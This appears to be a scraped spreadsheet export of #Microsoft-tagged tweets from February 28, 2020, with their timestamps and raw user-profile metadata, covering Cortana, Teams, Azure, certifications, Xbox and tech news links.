    <t>{'id': 3081725823, 'id_str': '3081725823', 'name': 'Monkey Viral', 'screen_name': 'monkey_viral', 'location': 'Globe &amp; Beyond', 'description': 'Where You Can Discover Just About Anything!', 'url': 'https://t.co/M3ev99NZIN', 'entities': {'url': {'urls': [{'url': 'https://t.co/M3ev99NZIN', 'expanded_url': 'https://monkeyviral.com', 'display_url': 'monkeyviral.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3586, 'friends_count': 683, 'listed_count': 14, 'created_at': 'Mon Mar 09 15:14:47 +0000 2015', 'favourites_count': 569, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 124553,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'http://pbs.twimg.com/profile_images/1067997797692116994/vxSpiPhL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1067997797692116994/vxSpiPhL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3081725823/1426994427',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</si>
  <si>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21:06:57 +0000 2020</t>
  </si>
  <si>
    <t>Received the results for my beta exam PL-900 Power Platform Fundamentals. It was worth the wait: Passed!
I can highly recommend this exam. Prepare yourself with the Microsoft Learn learning path. Interesting and great fun to do!
https://t.co/mMFfntec1e
#Microsoft #PowerPlatform https://t.co/tckxyXNc4Q</t>
  </si>
  <si>
    <t>{'id': 38026765, 'id_str': '38026765', 'name': 'Dennis van Doorn', 'screen_name': 'dvd76', 'location': 'The Netherlands', 'description': 'Cloud &amp; Security Consultant @wortell', 'url': 'https://t.co/gdQ1LJvawN', 'entities': {'url': {'urls': [{'url': 'https://t.co/gdQ1LJvawN', 'expanded_url': 'https://azure-lab.nl', 'display_url': 'azure-lab.nl', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 383, 'friends_count': 1642, 'listed_count': 69, 'created_at': 'Tue May 05 21:34:27 +0000 2009', 'favourites_count': 5160, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1969, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '08025C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/671453666231132160/ZHMbfaQk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/671453666231132160/ZHMbfaQk_normal.jpg', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'ADAFDB', 'profile_sidebar_fill_color': 'CCE5FF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 21:06:09 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts #Cortana drops consumer skills as it refocuses on business users https://t.co/bDXHfuofPI https://t.co/Y6TWJ8wayj</t>
  </si>
  <si>
    <t>Fri Feb 28 21:06:01 +0000 2020</t>
  </si>
  <si>
    <t>#MCSA, #MCSD, #MCSE certifications retire; with continued investment to role-based certifications
https://t.co/1XfGAjehkG
#Microsoft https://t.co/BjXeYASSDT</t>
  </si>
  <si>
    <t>Fri Feb 28 21:05:15 +0000 2020</t>
  </si>
  <si>
    <t>Public #health agency to evaluate 150 #Microsoft vendors for TB after exposure to infected... https://t.co/jYamlzV1JX</t>
  </si>
  <si>
    <t>Fri Feb 28 21:05:07 +0000 2020</t>
  </si>
  <si>
    <t>Unifying security policy across all mobile form-factors with @wandera and #Microsoft
https://t.co/0v4MRfE2rs @msftsecurity</t>
  </si>
  <si>
    <t>Fri Feb 28 21:04:58 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is retooling Cortana for the enterprise on Windows 10 https://t.co/TR8fPFoY4V via @SiliconANGLE #Microsoft #Cortana #enterprise</t>
  </si>
  <si>
    <t>Fri Feb 28 21:03:28 +0000 2020</t>
  </si>
  <si>
    <t>#IBM and #Microsoft sign Vatican pledge for ethical #AI, https://t.co/zrb0U1sL7v #ethics  #data #privacy</t>
  </si>
  <si>
    <t>{'id': 51038974, 'id_str': '51038974', 'name': 'Marie Wallace', 'screen_name': 'marie_wallace', 'location': 'Dublin, Ireland', 'description': 'Innovation Catalyst (Analytics &amp; Data Science, Social &amp; Collaboration), Strategist, Disrupter :-) and TED Speaker. Opinions my own.', 'url': 'http://t.co/AoeQdss2xr', 'entities': {'url': {'urls': [{'url': 'http://t.co/AoeQdss2xr', 'expanded_url': 'http://allthingsanalytics.com', 'display_url': 'allthingsanalytics.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4102, 'friends_count': 425, 'listed_count': 423, 'created_at': 'Fri Jun 26 12:34:26 +0000 2009', 'favourites_count': 2647, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8653,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'http://pbs.twimg.com/profile_images/1084455939347042310/PrckNxo4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1084455939347042310/PrckNxo4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/51038974/1547391785', 'profile_link_color': '0C0ECB',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</si>
  <si>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Fri Feb 28 21:01:35 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 21:01:15 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is retiring the Skype for Business online service, so it's time to future-proof with Teams-ready devices. The @YealinkNews VP59 Flagship Video Phone is compatible with Teams &amp;amp; interops with the Yealink MVC Teams Rooms series! https://t.co/sKLTAOCXpA #voip #microsoft https://t.co/W67q9pljHl</t>
  </si>
  <si>
    <t>{'id': 24776114, 'id_str': '24776114', 'name': '888VoIP', 'screen_name': '888Voip', 'location': 'Elma, NY', 'description': '888VoIP is the worldâ€™s preferred value-added distributor for VoIP hardware &amp; software solutions. Nationwide VoIP distribution from NY &amp; NV.', 'url': 'http://t.co/MwKOzRbyOf', 'entities': {'url': {'urls': [{'url': 'http://t.co/MwKOzRbyOf', 'expanded_url': 'http://www.888voip.com', 'display_url': '888voip.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3621, 'friends_count': 912, 'listed_count': 40, 'created_at': 'Mon Mar 16 21:42:06 +0000 2009', 'favourites_count': 1520, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2483,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'http://pbs.twimg.com/profile_images/1078309265474052097/AZO82LGe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1078309265474052097/AZO82LGe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24776114/1524496822',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</si>
  <si>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21:00:50 +0000 2020</t>
  </si>
  <si>
    <t>#cybersecurity #infosec #microsoft     VIA @office365     Overview of the Microsoft Graph Security API(video)  https://t.co/q94Sgrdlh5</t>
  </si>
  <si>
    <t>Fri Feb 28 21:00:36 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">@windowsdev To whom else might be interested of the outcome: apparently #Microsoft Ireland does NOT have an e-mail where to send them #invoices; this has been officially confirmed; we must print and send them through traditional mail to an address in the USA. 02.2020. </t>
  </si>
  <si>
    <t>{'id': 45308343, 'id_str': '45308343', 'name': 'Sorin Dolha', 'screen_name': 'SDolha', 'location': 'Cluj-Napoca, Romania', 'description': 'My passion is software development, but I also like physics.', 'url': 'https://t.co/TqWs8i3j3T', 'entities': {'url': {'urls': [{'url': 'https://t.co/TqWs8i3j3T', 'expanded_url': 'https://medium.com/@sdolha', 'display_url': 'medium.com/@sdolha', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 139, 'friends_count': 144, 'listed_count': 19, 'created_at': 'Sun Jun 07 08:35:16 +0000 2009', 'favourites_count': 135, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1970,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'http://pbs.twimg.com/profile_images/921381200601800704/kegB3VwY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/921381200601800704/kegB3VwY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/45308343/1354721511',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</si>
  <si>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Fri Feb 28 21:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 21:00:03 +0000 2020</t>
  </si>
  <si>
    <t>Day 12/12 completed  
Involving Azure Migrate with a successful DR testing last weekend using Azure Site Recovery 
Weekend mode enabled 
#microsoft #azure #azurefamily</t>
  </si>
  <si>
    <t>{'id': 145447219, 'id_str': '145447219', 'name': 'Thomas Thornton', 'screen_name': 'tamstar1234', 'location': 'Belfast, Northern Ireland', 'description': '@kainossoftware - MSFT\nAzure Solutions Architect Expert, Azure DevOps Expert, \nMCSA: Cloud Platform,  Azure Administrator &amp; Azure Security Engineer Certified', 'url': 'https://t.co/E39kjovqNd', 'entities': {'url': {'urls': [{'url': 'https://t.co/E39kjovqNd', 'expanded_url': 'http://thomasthornton.cloud', 'display_url': 'thomasthornton.cloud', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1433, 'friends_count': 1374, 'listed_count': 29, 'created_at': 'Wed May 19 00:44:11 +0000 2010', 'favourites_count': 4656, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5344,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False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1161734269775073280/0yapXacv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161734269775073280/0yapXacv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/145447219/1545600680', 'profile_link_color': '0099CC',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</si>
  <si>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Fri Feb 28 20:57:02 +0000 2020</t>
  </si>
  <si>
    <t>You ready for 100s of new features in #Microsoft's Wave 1 set of updates for Dynamics 365 CRM and ERP and Power Platform? I am! @ZDNet #cdwsocial https://t.co/99uqPqKbaJ</t>
  </si>
  <si>
    <t>Fri Feb 28 20:50:49 +0000 2020</t>
  </si>
  <si>
    <t>Manish Bhardia has been an @IAMCPSoCal Chapter Board Member since 2012. He has served on Membership Committee for 4 yrs,  Director at Large for 2 yrs, Partnering Chair for 1 yr &amp;amp; VP for 1 year. Currently serving as President, IAMCPSoCal
#iamcp #iamcpsocal #microsoft https://t.co/vjQotsj9Qh</t>
  </si>
  <si>
    <t>{'id': 14062212, 'id_str': '14062212', 'name': 'Manish Bhardia', 'screen_name': 'bhardia', 'location': 'Irvine, California', 'description': 'Principal @ ThinkAI, Adeptek, AI, BI, ChatBots, Teams, Cloud', 'url': 'https://t.co/AtmFi4SvUX', 'entities': {'url': {'urls': [{'url': 'https://t.co/AtmFi4SvUX', 'expanded_url': 'http://www.thinkaicorp.com', 'display_url': 'thinkaicorp.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 661, 'friends_count': 1300, 'listed_count': 55, 'created_at': 'Fri Feb 29 21:55:01 +0000 2008', 'favourites_count': 763, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1951,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'http://pbs.twimg.com/profile_images/952375324251058176/53A47sL__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/952375324251058176/53A47sL__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14062212/1575596556',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</si>
  <si>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20:48:04 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "NVIDIA Fixes High Severity Flaw in Windows GPU Display Driver:" https://t.co/aOjGHUWtnj
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Feb 28 20:45:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is neutering #Cortana https://t.co/MKmv1g6o8F</t>
  </si>
  <si>
    <t>{'id': 2832060986, 'id_str': '2832060986', 'name': 'Tech Help KB ðŸ“š', 'screen_name': 'techhelpkb', 'location': 'San Francisco, CA, USA', 'description': 'https://t.co/CK42CgoBCR - Technical help knowledgebase, tech news, how-to articles &amp; video tutorials for common issues. #TechSupport #Browser #Bitcoin #Privacy', 'url': 'https://t.co/XxTO97OGv6', 'entities': {'url': {'urls': [{'url': 'https://t.co/XxTO97OGv6', 'expanded_url': 'https://techhelpkb.com', 'display_url': 'techhelpkb.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/CK42CgoBCR', 'expanded_url': 'https://TechHelpKB.com', 'display_url': 'TechHelpKB.com', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 8913, 'friends_count': 9710, 'listed_count': 320, 'created_at': 'Thu Sep 25 16:47:24 +0000 2014', 'favourites_count': 1291, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 24156,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'http://pbs.twimg.com/profile_images/585657423509266432/41Qud0Xx_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/585657423509266432/41Qud0Xx_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2832060986/1487007298', 'profile_link_color': 'F7A700',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</si>
  <si>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Fri Feb 28 20:43:08 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info IBM and Microsoft support the Vaticans guidelines for ethical AI https://t.co/gYsFbsIzJp</t>
  </si>
  <si>
    <t>Fri Feb 28 20:43:06 +0000 2020</t>
  </si>
  <si>
    <t>My article on #Microsoft #WVD about the #benefits, #features and considerations regarding #citrix is finally online on @COMPUTERWOCHE https://t.co/VB4cGwcyfv
@Brinkhoff_C @RDS4U @JimMoyle @FrankSeibert @Avocado3000 @JasminDietz5 @mkdfranz1 @MichaelRuss79</t>
  </si>
  <si>
    <t>{'id': 703199276772433924, 'id_str': '703199276772433924', 'name': 'Daniel Vollmer ðŸ˜·ðŸ¦ ', 'screen_name': 'tr909jester', 'location': 'Ettlingen, Deutschland', 'description': 'CTO/#Transformer @AppSphere. Innovation, modern technologies and work styles are my passion. Office 365 and Azure are my favorite technology stacks.', 'url': 'https://t.co/UIKSibV1cz', 'entities': {'url': {'urls': [{'url': 'https://t.co/UIKSibV1cz', 'expanded_url': 'http://www.appsphere.com', 'display_url': 'appsphere.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 98, 'friends_count': 159, 'listed_count': 2, 'created_at': 'Fri Feb 26 12:45:47 +0000 2016', 'favourites_count': 429, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1072, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1039270896136085504/78nE4HOQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1039270896136085504/78nE4HOQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/703199276772433924/1511303521',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</si>
  <si>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20:41:56 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/TYRWkh3Mud
Nobody knows what the status will be for MS Ignite 2020 ?!
#Microsoft #MSTeams #M365 #Office365</t>
  </si>
  <si>
    <t>Fri Feb 28 20:39:18 +0000 2020</t>
  </si>
  <si>
    <t>Intune Troubleshooting 101 https://t.co/tvdNFsXU78 #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 20:37:23 +0000 2020</t>
  </si>
  <si>
    <t>@MicrosoftTeams This integration as well as custom development are what will help drive home that #microsoft #Teams isn't just a #skype replacement or a instant messenger but a #hub for automation,collaboration, and the #modernworkplace</t>
  </si>
  <si>
    <t>{'id': 2599740115, 'id_str': '2599740115', 'name': 'Chris Barber', 'screen_name': 'soi2dev', 'location': 'California, USA', 'description': 'Solutions Architect | Office 365 &amp; SharePoint Consultant | SCRUM Certified (CSM) | Chris@soi2dev.com', 'url': 'https://t.co/C46KCWt0hW', 'entities': {'url': {'urls': [{'url': 'https://t.co/C46KCWt0hW', 'expanded_url': 'https://www.linkedin.com/in/christopher-r-barber-41635447', 'display_url': 'linkedin.com/in/christopherâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 282, 'friends_count': 1049, 'listed_count': 40, 'created_at': 'Wed Jul 02 11:56:49 +0000 2014', 'favourites_count': 3858, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1961,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'http://pbs.twimg.com/profile_images/1210761589508304898/c-yKidb4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210761589508304898/c-yKidb4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2599740115/1471503824',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</si>
  <si>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20:30:50 +0000 2020</t>
  </si>
  <si>
    <t>We will be taking a short trip across to Glasgow tomorrow to sit in on some sessions from @scottishsummit #SS2020 #Microsoft #SharePoint #PowerPlatform #Office365 https://t.co/Zia98iVlL8</t>
  </si>
  <si>
    <t>{'id': 734867427427811329, 'id_str': '734867427427811329', 'name': 'Standsure Technology', 'screen_name': 'StandsureTech', 'location': 'Scotland, United Kingdom', 'description': 'Providers of Training, Consultancy, Support, Implementation, Migration and Administration Services for Microsoft SharePoint Server, Office 365 and Nintex.', 'url': 'https://t.co/RE58gkybVY', 'entities': {'url': {'urls': [{'url': 'https://t.co/RE58gkybVY', 'expanded_url': 'http://www.standsuretechnology.co.uk', 'display_url': 'standsuretechnology.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 233, 'friends_count': 734, 'listed_count': 29, 'created_at': 'Mon May 23 22:03:42 +0000 2016', 'favourites_count': 2241, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 646, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/892040755551883264/PicIxPme_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/892040755551883264/PicIxPme_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/734867427427811329/1501514038',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</si>
  <si>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20:28:18 +0000 2020</t>
  </si>
  <si>
    <t>GREAT Xbox Series X Interview giving us a few more details &amp;amp; talk of massive RDNA2 power
#Microsoft went big 
Microsoft Talks Xbox Series X DETAILS | Clarifies RDNA2 GPU Power, Next ... https://t.co/V3wI4DjZ9p 
#XboxSeriesX #Xbox https://t.co/wWOut3A0MP</t>
  </si>
  <si>
    <t>{'id': 2945341424, 'id_str': '2945341424', 'name': 'DEALER', 'screen_name': 'Dealer_Gaming', 'location': 'Xbox Live: ii dealer ii', 'description': 'Gamer, Xbox Centric YouTuber &amp; creator of YouTubeâ€™s largest Xbox podcast, RDX. YT: https://t.co/y5gtKPVcj3 Enterprise: dealergamingyt@gmail.com #Xbox', 'url': 'https://t.co/NJp7GjUu9K', 'entities': {'url': {'urls': [{'url': 'https://t.co/NJp7GjUu9K', 'expanded_url': 'https://www.patreon.com/DealerGaming', 'display_url': 'patreon.com/DealerGaming', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/y5gtKPVcj3', 'expanded_url': 'http://youtube.com/c/DealerGaming', 'display_url': 'youtube.com/c/DealerGaming', 'indices': [83, 106]}]}}, 'protected': False, 'followers_count': 9692, 'friends_count': 221, 'listed_count': 47, 'created_at': 'Sat Dec 27 17:34:45 +0000 2014', 'favourites_count': 25831, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 14923,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'http://pbs.twimg.com/profile_images/1178773291491893249/7IKiFf5t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1178773291491893249/7IKiFf5t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2945341424/1581913906',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</si>
  <si>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20:28:13 +0000 2020</t>
  </si>
  <si>
    <t>IBM and Microsoft support the Vaticans guidelines for ethical AI https://t.co/4trS0Bv1d0 #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 20:23:59 +0000 2020</t>
  </si>
  <si>
    <t>Who Holds the Keys to Winning the Console War?
#playstation #nintendo #microsoft https://t.co/IWlQUWUeTl https://t.co/s0InLdOcZ2</t>
  </si>
  <si>
    <t>{'id': 18257270, 'id_str': '18257270', 'name': 'The Koalition', 'screen_name': 'TheKoalition', 'location': 'The Internet', 'description': 'Official account! We give you video game &amp; entertainment news, reviews/previews, podcasts &amp; more from the most passionate gamers anywhere.', 'url': 'https://t.co/CNqflXjwQJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/CNqflXjwQJ', 'expanded_url': 'http://thekoalition.com/', 'display_url': 'thekoalition.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2477, 'friends_count': 830, 'listed_count': 93, 'created_at': 'Sat Dec 20 00:43:48 +0000 2008', 'favourites_count': 1925, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 22531, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '030E20', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme6/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/954755244222803968/G5bV9703_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/954755244222803968/G5bV9703_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18257270/1516465836', 'profile_link_color': '1F3A93', 'profile_sidebar_border_color': '252525', 'profile_sidebar_fill_color': '242422', 'profile_text_color': 'FFFFFF', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Feb 28 20:23:10 +0000 2020</t>
  </si>
  <si>
    <t>Debotnet 0.6.4 is out!
This release expands the @MicrosoftEdge scripting.
Release notes &amp;amp; download
https://t.co/Fils5ag45P
#debotnet #Microsoft #Windows10 #privacy #telemetry #debloat https://t.co/LOtI17R9Pp</t>
  </si>
  <si>
    <t>{'id': 1209243017414135808, 'id_str': '1209243017414135808', 'name': 'Mirinsoft', 'screen_name': 'mirinsoft', 'location': 'Germany', 'description': 'Good apps are as little apps as possible', 'url': 'https://t.co/BX4V3Bha7X', 'entities': {'url': {'urls': [{'url': 'https://t.co/BX4V3Bha7X', 'expanded_url': 'https://www.mirinsoft.com', 'display_url': 'mirinsoft.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 23, 'friends_count': 33, 'listed_count': 0, 'created_at': 'Mon Dec 23 22:43:02 +0000 2019', 'favourites_count': 39, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1209243191729414150/UITNp6ZK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209243191729414150/UITNp6ZK_normal.jpg',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</si>
  <si>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20:20:36 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #cloud  #microsoftteams     City of Westminster College uses @MicrosoftTeams to help every student communicate and #collaborate. #Teamwork https://t.co/SdrdBotWdV</t>
  </si>
  <si>
    <t>Fri Feb 28 20:16:32 +0000 2020</t>
  </si>
  <si>
    <t>Security Buzz: #Microsoft Announces General Availability of Threat Protection, Insider Risk Management https://t.co/HpjgYb3CSX via @DarkReading #cybersecurity https://t.co/F6HcdNCuOC https://t.co/reEIHkHEvX https://t.co/MpznGsDVxF</t>
  </si>
  <si>
    <t>Fri Feb 28 20:15:23 +0000 2020</t>
  </si>
  <si>
    <t>Time to cancel your #edtech conference? #Facebook pulls out of its biggest event; #Microsoft Microsoft follows,
https://t.co/JKSbVqcrds https://t.co/X7bIwCf400</t>
  </si>
  <si>
    <t>{'id': 924809331861794816, 'id_str': '924809331861794816', 'name': 'IBL News', 'screen_name': 'iblnews', 'location': 'New York, USA', 'description': 'IBL News is a trusted source for news and insights about online education at scale. Nonprofit initiative, CC license. In collaboration with @ibleducation', 'url': 'https://t.co/ctrIGRuitV', 'entities': {'url': {'urls': [{'url': 'https://t.co/ctrIGRuitV', 'expanded_url': 'http://iblnews.org', 'display_url': 'iblnews.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 418, 'friends_count': 42, 'listed_count': 2, 'created_at': 'Mon Oct 30 01:25:01 +0000 2017', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 363,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'http://pbs.twimg.com/profile_images/1021464562371948544/Ql7iPIm6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1021464562371948544/Ql7iPIm6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/924809331861794816/1509327020',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</si>
  <si>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20:15:06 +0000 2020</t>
  </si>
  <si>
    <t>Effortless #collaboration. Unleashed creativity. Enhanced #productivity.
The ability to #work from anywhere, at any time. Thats what using
#Microsoft365 through #Windows10 offersand what the #Microsoft
#Surface... https://t.co/2ngjT8j9aJ</t>
  </si>
  <si>
    <t>{'id': 1082055640955191297, 'id_str': '1082055640955191297', 'name': 'ShopTech.xyz; Powered by: RJO Ventures, Inc.', 'screen_name': 'ShopTechxyz', 'location': 'Miami, FL', 'description': 'Computer Hardware &amp; Software, IT Services and Consulting; #ShopTechxyz is Powered by: #RJOVenturesInc. Contact: Call/Text: 786-208-1529', 'url': 'https://t.co/7ovwHzCtv3', 'entities': {'url': {'urls': [{'url': 'https://t.co/7ovwHzCtv3', 'expanded_url': 'http://www.shoptech.xyz', 'display_url': 'shoptech.xyz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 35, 'friends_count': 81, 'listed_count': 2, 'created_at': 'Sun Jan 06 23:25:43 +0000 2019', 'favourites_count': 671, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 906, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1093897113115734017/aghJhSJ9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1093897113115734017/aghJhSJ9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1082055640955191297/1550755486',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</si>
  <si>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20:13:56 +0000 2020</t>
  </si>
  <si>
    <t>Lmfao #thatxboxlife tho #xbox #xboxone #Microsoft #console #gaming #gamer https://t.co/9g25YswZ3I</t>
  </si>
  <si>
    <t>{'id': 738512927364288512, 'id_str': '738512927364288512', 'name': 'ð”¾ð•šð•Ÿð•˜ð•£ð”¹ð•£ð•–ð••ð”¹ð•–ð•’ð•¦ð•¥ð•ª || PULSE', 'screen_name': 'gingrbredbeauty', 'location': '', 'description': 'Stream schedule: (approx) Weekdays 1pm EST. Maybe some evenings https://t.co/QpRiTr4xml #PulseGang', 'url': 'https://t.co/QpRiTr4xml', 'entities': {'url': {'urls': [{'url': 'https://t.co/QpRiTr4xml', 'expanded_url': 'http://twitch.tv/gingrbredbeauty', 'display_url': 'twitch.tv/gingrbredbeauty', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/QpRiTr4xml', 'expanded_url': 'http://twitch.tv/gingrbredbeauty', 'display_url': 'twitch.tv/gingrbredbeauty', 'indices': [64, 87]}]}}, 'protected': False, 'followers_count': 730, 'friends_count': 555, 'listed_count': 4, 'created_at': 'Thu Jun 02 23:29:37 +0000 2016', 'favourites_count': 10856, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1794, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1229863596751933440/vvAQLCcP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229863596751933440/vvAQLCcP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/738512927364288512/1582210126',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</si>
  <si>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20:12:30 +0000 2020</t>
  </si>
  <si>
    <t>SharePoint Roadmap Pitstop: February 2020 #Microsoft  https://t.co/NCiBJrnLRS</t>
  </si>
  <si>
    <t>New Cortana experience coming to Windows 10 helps you achieve more with less effort #Microsoft  https://t.co/lxCt5fEg4q</t>
  </si>
  <si>
    <t>Fri Feb 28 20:09:18 +0000 2020</t>
  </si>
  <si>
    <t>Azure Sentinel: Syslog, CEF and other 3rd party connectors grand list https://t.co/THiMI4wPmx #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 20:07:05 +0000 2020</t>
  </si>
  <si>
    <t>We share a lot of information to protect you from #hackers (don't forget tomorrow is #SecuritySaturday), but here are some good #hacks to keep you efficient.
https://t.co/epGY5VGOhm
*
*
*
